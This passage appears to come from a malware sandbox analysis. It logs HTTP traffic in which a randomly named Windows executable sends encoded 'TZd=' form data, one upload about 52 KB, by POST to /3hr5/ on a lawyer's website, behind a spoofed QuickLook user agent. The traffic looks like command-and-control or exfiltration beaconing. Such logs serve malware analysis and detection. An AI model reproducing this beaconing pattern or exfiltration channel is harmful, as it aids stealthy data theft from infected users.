                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Dec 4, 2023 15:27:58.198612928 CET834OUTPOST /3hr5/ HTTP/1.1
                                                                                                                              Host: www.austintrafficlawyer.com
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              Origin: http://www.austintrafficlawyer.com
                                                                                                                              Referer: http://www.austintrafficlawyer.com/3hr5/
                                                                                                                              Connection: close
                                                                                                                              Content-Length: 184
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) QuickLook/5.0
                                                                                                                              Data Raw: 54 5a 64 3d 52 2b 53 6e 7a 38 6a 65 39 76 79 45 4c 56 48 4f 6f 2b 64 34 71 34 57 35 57 66 2f 56 78 2f 58 30 6e 36 34 47 31 51 4b 71 59 34 75 2b 68 4c 69 4e 33 63 6e 7a 37 75 65 59 48 31 32 4c 34 30 38 63 4f 4c 6b 4f 54 4e 65 2f 52 68 31 30 6f 76 6a 6e 38 45 32 30 79 6b 69 4e 42 4b 4f 4d 32 77 62 67 41 49 37 6c 66 63 50 35 2b 67 38 41 4c 59 4d 41 66 54 6e 68 66 70 43 4f 6a 77 5a 5a 6e 79 71 70 79 44 7a 36 6d 75 6d 4f 6a 61 42 67 4a 39 63 70 61 42 75 64 64 46 67 32 55 6a 38 33 6d 68 46 32 48 4b 54 31 61 53 48 69 35 47 49 66 4b 6d 52 39 4c 51 3d 3d
                                                                                                                              Data Ascii: TZd=R+Snz8je9vyELVHOo+d4q4W5Wf/Vx/X0n64G1QKqY4u+hLiN3cnz7ueYH12L408cOLkOTNe/Rh10ovjn8E20ykiNBKOM2wbgAI7lfcP5+g8ALYMAfTnhfpCOjwZZnyqpyDz6mumOjaBgJ9cpaBuddFg2Uj83mhF2HKT1aSHi5GIfKmR9LQ==
                                                                                                                              Dec 4, 2023 15:27:58.402602911 CET634INHTTP/1.1 404 Not Found
                                                                                                                              Content-Type: text/html
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: close
                                                                                                                              Date: Mon, 04 Dec 2023 14:27:58 GMT
                                                                                                                              Server: Apache
                                                                                                                              Content-Encoding: gzip
                                                                                                                              Data Raw: 31 38 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 51 4b 4f e3 30 10 be f7 57 cc 7a 0f 9c 1c 37 94 43 9b 26 1c b6 ad b4 48 85 45 28 88 e5 68 62 b7 b1 e4 78 82 33 21 0d bf 1e 27 e5 b1 20 b4 27 8f ed ef 31 f3 4d fa 63 fd 67 95 df 5f 6f a0 a4 ca c2 f5 ed af ed c5 0a 18 17 e2 6e b6 12 62 9d af e1 ef ef fc 72 0b 71 34 85 dc 4b d7 18 32 e8 a4 15 62 73 c5 26 ac 24 aa 13 21 ba ae 8b ba 59 84 7e 2f f2 1b 71 18 b4 e2 81 fc 5a 72 fa 87 19 29 52 ec 7c 92 8e 86 56 ba 7d c6 b4 63 70 a8 6c f2 e9 e6 9a ec 1b f9 78 b1 58 1c 55 83 06 a4 a5 96 2a 9c 90 92 21 ab 87 0a 36 de a3 87 b3 e9 19 70 b8 42 82 1d b6 4e 0d 10 f1 8e 49 2b 4d 12 0a 74 a4 1d 65 8c f4 81 c4 d0 ce 12 8a 52 fa 46 53 d6 d2 8e cf 59 08 85 6a ae 1f 5b f3 94 b1 d5 11 ce f3 be d6 83 37 7c 51 71 c8 0b 59 94 fa 33 6b 7c e2 83 95 47 3b b6 2c 5e 7b 4e 1f 50 f5 d0 50 6f 75 c6 76 01 c0 77 b2 32 b6 4f a4 37 d2 2e 8f 16 65 fc 86 28 d0 a2 4f 7e 4e e5 ec 74 5e 2c 47 7c 63 9e 75 12 16 a3 ab 23 fa 3f a3 97 f1 d8 71 fd a6 f6 c1 9f 46 f3 77 fe 3d b6 1e 1e 3c 76 8d f6 50 48 77 12 d2 33 4e 01 95 1a 14 16 6d 15 e2 0a b1 79 af 9b 1a 9d 32 6e 0f 84 e3 ef ed cd 16 7a 6c 81 42 38 0a 8c 8b c6 c0 eb 60 9a 8a 61 ce b0 ef 31 e1 f3 c9 0b 6c 60 6d 75 72 02 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                              Data Ascii: 189}QKO0Wz7C&HE(hbx3!' '1Mcg_onbrq4K2bs&$!Y~/qZr)R|V}cplxXU*!6pBNI+MteRFSYj[7|QqY3k|G;,^{NPPouvw2O7.e(O~Nt^,G|cu#?qFw=<vPHw3Nmy2nzlB8`a1l`mur0


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              83192.168.11.2050214217.160.0.27808076C:\Program Files (x86)\xBtEEHVveuQicIceYFyfhlDfihQuJpZjmMFRvDFoPTfQADjsKirsjstcrRvOzQVZoOfOU\czazZqNSMxullu.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Dec 4, 2023 15:28:00.914663076 CET1174OUTPOST /3hr5/ HTTP/1.1
                                                                                                                              Host: www.austintrafficlawyer.com
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              Origin: http://www.austintrafficlawyer.com
                                                                                                                              Referer: http://www.austintrafficlawyer.com/3hr5/
                                                                                                                              Connection: close
                                                                                                                              Content-Length: 524
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) QuickLook/5.0
                                                                                                                              Data Raw: 54 5a 64 3d 52 2b 53 6e 7a 38 6a 65 39 76 79 45 4c 32 66 4f 37 50 64 34 73 59 57 2b 54 66 2f 56 2f 66 57 39 6e 36 6b 47 31 52 65 45 59 71 36 2b 34 76 75 4e 6c 4a 48 7a 2b 75 65 59 50 56 32 4f 6c 6b 38 48 4f 4d 73 47 54 4a 57 2f 52 68 78 30 75 63 37 6e 31 55 32 33 38 45 69 4d 47 4b 4f 33 67 77 62 55 41 49 2f 58 66 65 7a 35 2b 78 51 41 4b 5a 67 41 4a 69 6d 33 59 4a 43 4d 30 41 5a 61 77 69 71 76 79 44 2b 50 6d 76 65 65 6a 73 68 67 4a 65 55 70 62 42 75 63 45 6c 68 66 57 6a 39 63 70 78 59 7a 44 38 6a 46 4e 33 48 73 32 57 46 4a 4a 47 38 69 65 53 47 6b 38 6d 77 51 6b 53 6a 6e 61 34 44 5a 73 47 7a 54 38 6c 32 75 32 6a 73 6e 46 4f 68 4f 36 42 71 33 75 47 43 50 59 48 43 68 66 34 4d 6c 75 58 36 4b 55 73 46 6b 52 4f 67 35 4e 4f 4e 6f 59 76 67 5a 53 70 4c 7a 68 34 67 63 77 50 49 79 38 42 31 48 71 49 50 65 31 65 56 66 6e 78 2b 38 64 4d 53 4f 2b 79 66 6d 66 53 67 6a 47 50 56 30 4f 35 46 48 64 50 38 45 7a 6d 46 75 75 65 6a 77 2b 59 56 32 4b 72 2f 34 64 51 55 4f 44 50 56 78 7a 4f 37 46 50 48 71 39 63 50 5a 78 57 30 36 71 33 76 66 75 35 75 75 54 6f 42 78 75 35 54 39 4c 76 62 61 62 38 70 70 46 2b 53 47 6d 56 38 4a 79 4e 66 53 33 72 61 42 41 68 70 6d 2b 34 74 66 34 7a 6a 4c 4e 6a 67 68 43 38 63 6c 6e 50 79 73 5a 4a 34 6e 67 5a 36 72 36 4a 49 43 6d 7a 74 62 36 6c 44 39 71 52 5a 58 4e 78 33 4d 47 39 30 58 67 77 61 79 66 4f 7a 34 4e 77 63 51 50 39 52 51 36 2b 4e 4e 4c 4b 79 70 70 36 45 5a 35 61 53 55 47 76 55 43 42 56 4e 58 35 2b 56 49 69 65 34 77 54 39 54 44 2b 4f 71 65 43 57 6d 48 32 71 2b 48 41 51 75 37 5a 67 77 52 58 44 72 6a 31 32 67 56 72 34 4f 69 6b 74 59 45 3d
                                                                                                                              Data Ascii: TZd=R+Snz8je9vyEL2fO7Pd4sYW+Tf/V/fW9n6kG1ReEYq6+4vuNlJHz+ueYPV2Olk8HOMsGTJW/Rhx0uc7n1U238EiMGKO3gwbUAI/Xfez5+xQAKZgAJim3YJCM0AZawiqvyD+PmveejshgJeUpbBucElhfWj9cpxYzD8jFN3Hs2WFJJG8ieSGk8mwQkSjna4DZsGzT8l2u2jsnFOhO6Bq3uGCPYHChf4MluX6KUsFkROg5NONoYvgZSpLzh4gcwPIy8B1HqIPe1eVfnx+8dMSO+yfmfSgjGPV0O5FHdP8EzmFuuejw+YV2Kr/4dQUODPVxzO7FPHq9cPZxW06q3vfu5uuToBxu5T9Lvbab8ppF+SGmV8JyNfS3raBAhpm+4tf4zjLNjghC8clnPysZJ4ngZ6r6JICmztb6lD9qRZXNx3MG90XgwayfOz4NwcQP9RQ6+NNLKypp6EZ5aSUGvUCBVNX5+VIie4wT9TD+OqeCWmH2q+HAQu7ZgwRXDrj12gVr4OiktYE=
                                                                                                                              Dec 4, 2023 15:28:01.109859943 CET634INHTTP/1.1 404 Not Found
                                                                                                                              Content-Type: text/html
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: close
                                                                                                                              Date: Mon, 04 Dec 2023 14:28:01 GMT
                                                                                                                              Server: Apache
                                                                                                                              Content-Encoding: gzip
                                                                                                                              Data Raw: 31 38 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 51 4b 4f e3 30 10 be f7 57 cc 7a 0f 9c 1c 37 94 43 9b 26 1c b6 ad b4 48 85 45 28 88 e5 68 62 b7 b1 e4 78 82 33 21 0d bf 1e 27 e5 b1 20 b4 27 8f ed ef 31 f3 4d fa 63 fd 67 95 df 5f 6f a0 a4 ca c2 f5 ed af ed c5 0a 18 17 e2 6e b6 12 62 9d af e1 ef ef fc 72 0b 71 34 85 dc 4b d7 18 32 e8 a4 15 62 73 c5 26 ac 24 aa 13 21 ba ae 8b ba 59 84 7e 2f f2 1b 71 18 b4 e2 81 fc 5a 72 fa 87 19 29 52 ec 7c 92 8e 86 56 ba 7d c6 b4 63 70 a8 6c f2 e9 e6 9a ec 1b f9 78 b1 58 1c 55 83 06 a4 a5 96 2a 9c 90 92 21 ab 87 0a 36 de a3 87 b3 e9 19 70 b8 42 82 1d b6 4e 0d 10 f1 8e 49 2b 4d 12 0a 74 a4 1d 65 8c f4 81 c4 d0 ce 12 8a 52 fa 46 53 d6 d2 8e cf 59 08 85 6a ae 1f 5b f3 94 b1 d5 11 ce f3 be d6 83 37 7c 51 71 c8 0b 59 94 fa 33 6b 7c e2 83 95 47 3b b6 2c 5e 7b 4e 1f 50 f5 d0 50 6f 75 c6 76 01 c0 77 b2 32 b6 4f a4 37 d2 2e 8f 16 65 fc 86 28 d0 a2 4f 7e 4e e5 ec 74 5e 2c 47 7c 63 9e 75 12 16 a3 ab 23 fa 3f a3 97 f1 d8 71 fd a6 f6 c1 9f 46 f3 77 fe 3d b6 1e 1e 3c 76 8d f6 50 48 77 12 d2 33 4e 01 95 1a 14 16 6d 15 e2 0a b1 79 af 9b 1a 9d 32 6e 0f 84 e3 ef ed cd 16 7a 6c 81 42 38 0a 8c 8b c6 c0 eb 60 9a 8a 61 ce b0 ef 31 e1 f3 c9 0b 6c 60 6d 75 72 02 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                              Data Ascii: 189}QKO0Wz7C&HE(hbx3!' '1Mcg_onbrq4K2bs&$!Y~/qZr)R|V}cplxXU*!6pBNI+MteRFSYj[7|QqY3k|G;,^{NPPouvw2O7.e(O~Nt^,G|cu#?qFw=<vPHw3Nmy2nzlB8`a1l`mur0


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              84192.168.11.2050215217.160.0.27808076C:\Program Files (x86)\xBtEEHVveuQicIceYFyfhlDfihQuJpZjmMFRvDFoPTfQADjsKirsjstcrRvOzQVZoOfOU\czazZqNSMxullu.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Dec 4, 2023 15:28:03.633934021 CET12914OUTPOST /3hr5/ HTTP/1.1
                                                                                                                              Host: www.austintrafficlawyer.com
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              Origin: http://www.austintrafficlawyer.com
                                                                                                                              Referer: http://www.austintrafficlawyer.com/3hr5/
                                                                                                                              Connection: close
                                                                                                                              Content-Length: 52912
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) QuickLook/5.0
                                                                                                                              Data Raw: 54 5a 64 3d 52 2b 53 6e 7a 38 6a 65 39 76 79 45 4c 32 66 4f 37 50 64 34 73 59 57 2b 54 66 2f 56 2f 66 57 39 6e 36 6b 47 31 52 65 45 59 71 43 2b 34 38 6d 4e 33 34 48 7a 39 75 65 59 46 31 32 50 6c 6b 39 66 4f 4e 49 43 54 4a 61 76 52 69 5a 30 75 4c 6e 6e 30 6d 65 33 73 55 69 50 4e 71 4f 50 32 77 62 2b 41 49 37 4c 66 65 6d 4d 2b 67 6b 41 4c 5a 51 41 62 42 2f 68 5a 5a 43 4f 30 41 5a 57 36 43 72 61 79 44 37 49 6d 76 43 65 6a 71 70 67 49 76 6f 70 64 53 32 63 63 46 68 65 63 44 39 54 67 52 59 47 44 36 50 33 4e 33 47 62 32 58 78 4a 4a 46 30 69 66 52 75 6e 37 47 77 51 75 79 6a 6b 65 34 50 64 73 48 62 31 38 6c 53 75 32 6a 55 6e 58 2b 68 4f 38 6b 57 32 6a 32 44 47 4c 58 43 4d 53 59 41 39 75 58 2b 30 55 70 46 6b 51 39 63 35 50 2f 4e 6f 5a 4f 67 5a 56 35 4c 39 76 59 68 51 36 76 49 32 38 42 6c 68 71 4d 79 72 31 5a 46 66 31 6b 4b 38 4e 39 53 4e 33 79 66 6b 54 79 68 37 43 50 5a 77 4f 39 70 44 64 50 38 55 7a 6e 42 75 75 4e 37 77 73 4a 56 31 4f 37 2f 31 45 41 55 66 4d 76 5a 37 7a 49 66 4e 50 48 53 54 63 4d 31 78 58 55 36 71 6c 59 4c 74 7a 65 75 51 67 68 77 33 6e 6a 39 51 76 62 57 74 38 74 77 79 2b 69 36 6d 48 38 5a 79 49 50 53 77 2b 4b 42 45 76 4a 6d 34 38 74 66 34 7a 6b 44 7a 6a 67 74 43 2f 75 6c 6e 4f 41 30 5a 5a 62 50 67 66 36 72 38 4a 49 44 67 7a 74 6d 45 6c 41 64 41 52 5a 6e 6a 78 78 73 47 39 68 4c 67 78 59 4b 51 63 7a 34 45 37 38 51 6d 69 68 55 74 2b 4e 68 54 4b 79 34 53 36 30 31 35 62 54 6f 47 72 55 43 41 51 74 58 36 32 31 4a 6a 55 6f 38 58 39 54 66 55 4f 72 71 53 57 6d 2f 32 36 61 2b 4a 50 4e 43 45 78 79 78 2f 44 64 72 34 33 43 30 6a 71 61 65 42 37 74 52 79 42 70 57 33 41 53 79 34 5a 49 54 6b 2b 58 67 42 38 6e 6d 35 6a 73 68 44 33 35 75 32 59 73 5a 76 52 38 64 76 70 7a 74 32 79 4d 53 61 79 4e 76 70 39 49 58 75 4d 58 64 4d 69 77 41 66 59 4c 37 30 46 52 68 68 6e 50 66 37 61 31 46 54 2f 63 2b 51 6c 43 53 2b 56 77 4e 49 31 51 32 6c 67 79 5a 4e 42 42 66 72 64 55 33 74 32 64 77 6d 2b 53 54 73 77 58 76 7a 2f 47 70 43 31 6e 36 70 41 53 4e 73 4a 4d 5a 31 65 64 47 32 30 65 44 36 39 55 57 30 4e 63 59 70 76 4a 30 4f 66 6c 64 4e 30 48 5a 57 47 54 4e 54 4a 4c 6e 32 76 31 49 50 45 30 32 4a 31 65 34 56 68 4c 66 6c 46 6c 6f 6b 67 36 77 31 37 57 41 73 79 64 43 47 6c 39 55 70 36 6b 41 75 6f 38 44 58 43 36 39 74 44 4f 57 57 48 55 7a 64 63 46 52 51 72 4c 70 4c 6a 4f 6d 41 4d 37 32 32 36 73 38 64 62 50 2f 73 49 4a 43 48 4b 4b 5a 64 65 68 69 76 6b 38 78 38 45 41 48 56 2b 35 4a 31 51 43 74 53 4b 74 6f 71 30 42 61 33 4d 6a 35 76 34 57 4f 4a 73 6b 7a 75 6d 37 7a 42 78 62 70 70 33 43 2f 6c 33 41 75 4e 5a 69 61 44 61 2f 4e 78 4b 48 6d 37 2b 6c 6c 6e 38 75 65 49 64 59 43 53 31 57 68 42 54 51 7a 69 31 43 50 4e 76 79 49 37 6e 51 6a 4f 34 68 33 59 4c 68 6d 63 38 75 72 74 52 32 68 58 43 33 6c 43 58 72 47 63 69 46 6f 4b 4e 54 36 50 71 65 78 79 48 62 5a 52 31 62 4c 4f 61 32 2b 6b 5a 6f 53 72 5a 58 2f 72 66 41 54 59 61 4f 42 6f 78 4b 32 37 72 32 65 51 74 35 53 4b 4f 49 4b 6e 57 4f 34 77 54 4e 65 6a 63 34 74 44 31 48 37 51 7a 2b 55 47 61 5a 53 7a 76 54 38 54 47 2b 65 48 37 71 4d 4d 58 4f 4d 79 4c 73 4d 67 38 61 76 49 31 4c 51 33 78 69 69 34 41 58 41 61 6e 44 74 30 63 37 61 64 37 33 6b 6e 4a 31 65 7a 54 41 35 63 38 36 51 36 50 49 62 59 34 4c 38 75 33 53 68 56 77 38 52 6b 55 58 51 6d 6f 77 7a 6a 51 66 6a 34 6b 46 4e 59 77 49 44 2f 46 48 6f 44 68 47 4c 46 37 78 72 75 50 4e 2b 47 51 6e 54 4e 4d 72 75 61 41 76 6d 65 68 74 6c 4e 4e 32 6a 6d 2f 6a 37 6d 5a 54 5a 78 57 58 56 54 61 45 4b 75 45 78 36 5a 66 30 46 78 67 75 39 6d 54 4a 45 6e 35 4f 39 69 73 6c 71 69 51 46 77 2b 71 46 73 2f 71 7a 55 4c 78 65 65 39 38 64 74 42 43 6c 42 42 7a 6c 2b 44 55 4b 31 41 71 43 79 64 58 7a 37 59 72 44 4e 36 4c 6f 6e 62 68 4a 41 37 35 6e 46 4d 47 67 38 46 39 4b 30 48 69 76 48 58 53 77 79 41 55 6d 68 61 48 68 64 77 38 2b 55 77 36 4b 2b 34 32 67 66 67 42 52 52 78 65 52 53 54 76 73 7a 49 48 35 55 6a 76 63 6b 38 5a 34 53 62 32 31 33 68 75 46 49 45 62 4b 30 36 31 64 33 45 47 54 6a 72 72 57 63 34 78 43 61 2f 45 58 50 4e 62 58 76 71 34 32 55 48 48 67 63 5a 7a 74 42 36 45 52 46 62 6e 45 6e 50 36 37 31 64 6d 6d 74 6f 39 4d 75 76 33 4f 6c 66 75 76 7a 61 4f 59 4e 78 59 59 4a 34 32 45 46 4f 31 57 31
                                                                                                                              Data Ascii: TZd=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
                                                                                                                              Dec 4, 2023 15:28:03.822649002 CET2626OUTData Raw: 32 39 6b 53 48 66 74 4f 4d 56 67 66 65 4f 2f 4d 61 38 51 79 78 37 50 63 57 78 73 48 76 57 37 41 37 34 71 46 31 78 66 55 44 35 4b 63 36 71 53 4d 42 72 66 50 71 65 61 79 4a 73 57 51 35 7a 62 2b 35 5a 79 77 65 2f 48 4f 72 6a 43 7a 66 59 66 72 62 6c
                                                                                                                              Data Ascii: 29kSHftOMVgfeO/Ma8Qyx7PcWxsHvW7A74qF1xfUD5Kc6qSMBrfPqeayJsWQ5zb+5Zywe/HOrjCzfYfrbl+fb6Hcl1bKXun5AtXDSb/FEhVartMKLt4oMpPQtgtmkHZkjdNk1SUIF9o6qAUZHj753b65eQMJuwroqrJd91NrEz8ZENUPwOjY1SFbNY841DoVDhh/tXjNZpmM5RpwF2VVF/hklI6/rFVUl3GY6AbLfx3GnmZOTTq
                                                                                                                              Dec 4, 2023 15:28:03.822734118 CET3912OUTData Raw: 6f 37 4a 4c 77 62 6a 64 6d 66 75 50 36 78 63 75 41 47 37 33 34 47 39 69 59 6f 4b 43 77 36 35 68 4e 56 38 6e 37 4f 39 32 31 4b 53 73 51 32 78 72 34 61 69 78 48 4a 63 4d 2b 4f 2b 66 47 73 77 61 38 70 57 77 63 41 50 32 57 68 72 50 65 54 75 48 4f 64
                                                                                                                              Data Ascii: o7JLwbjdmfuP6xcuAG734G9iYoKCw65hNV8n7O921KSsQ2xr4aixHJcM+O+fGswa8pWwcAP2WhrPeTuHOdevFtcC/daF0970dGjGLBwesAXuIaTpBRXgx5Nsxi829YqV0HAX39+UHJlyoJ8tmJKD/fGb4xgn2upCuqIyMRIyJ1+x+QiqeEa6sgeE2tGWcbeknvLJ0CJr2kpzqvekYNMTyV0cEHYLW+eNwbeG9Zh15tgCJIhbQn5
                                                                                                                              Dec 4, 2023 15:28:03.822783947 CET1340OUTData Raw: 39 58 73 6b 75 78 58 52 41 56 39 34 44 49 4a 55 31 69 67 77 56 78 4a 74 59 4b 75 62 65 30 65 68 38 57 54 64 50 42 53 35 77 61 43 38 6b 63 2b 76 70 5a 69 52 66 7a 39 45 6a 47 31 69 71 4e 44 4e 33 63 73 72 2f 4e 35 45 4e 63 47 54 54 45 50 37 70 61
